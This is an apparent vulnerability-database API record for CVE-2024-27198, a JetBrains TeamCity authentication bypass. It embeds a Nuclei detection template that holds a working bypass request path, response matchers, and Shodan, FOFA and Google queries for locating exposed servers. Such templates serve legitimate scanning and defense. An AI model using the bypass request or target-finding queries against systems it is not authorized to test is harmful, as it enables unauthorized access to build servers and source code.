{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-27198/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-27198/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-27198/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-27198/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-27198/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-27198"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-27198"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-27198.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-27198\n\ninfo:\n  name: TeamCity < 2023.11.4 - Authentication Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n  impact: |\n    Unauthenticated attackers can bypass authentication to perform administrative actions on TeamCity servers, potentially compromising build pipelines and source code.\n  remediation: |\n    Update JetBrains TeamCity to version 2023.11.4 or later.\n  reference:\n    - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-27198\n    - https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive\n    - https://github.com/rampantspark/CVE-2024-27198\n    - https://github.com/fireinrain/github-trending\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-27198\n    cwe-id: CWE-288\n    epss-score: 0.99938\n    epss-percentile: 0.9997\n    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: jetbrains\n    product: teamcity\n    shodan-query:\n      - http.component:\"TeamCity\"\n      - http.title:teamcity\n      - http.component:\"teamcity\"\n    fofa-query: title=teamcity\n    google-query: intitle:teamcity\n  tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/hax?jsp=/app/rest/server;.jsp\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - '(contains(header, \"application/xml\") || contains(header, \"text/xml\"))'\n          - 'contains_all(body, \"buildNumber\", \"server version\", \"internalId\")'\n          - '!contains(body, \"Authentication required\")'\n          - '!contains(body, \"login.html\")'\n        condition: and\n# digest: 4b0a00483046022100c0d60eac92fe3f3753a47b88bcbad1037a95cdcc496801c12c0d2fa554139d49022100c96bcec006f7921dd0475f9976a8f829842a09d218898160a24bb0e551fbf3b5:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-27198"
}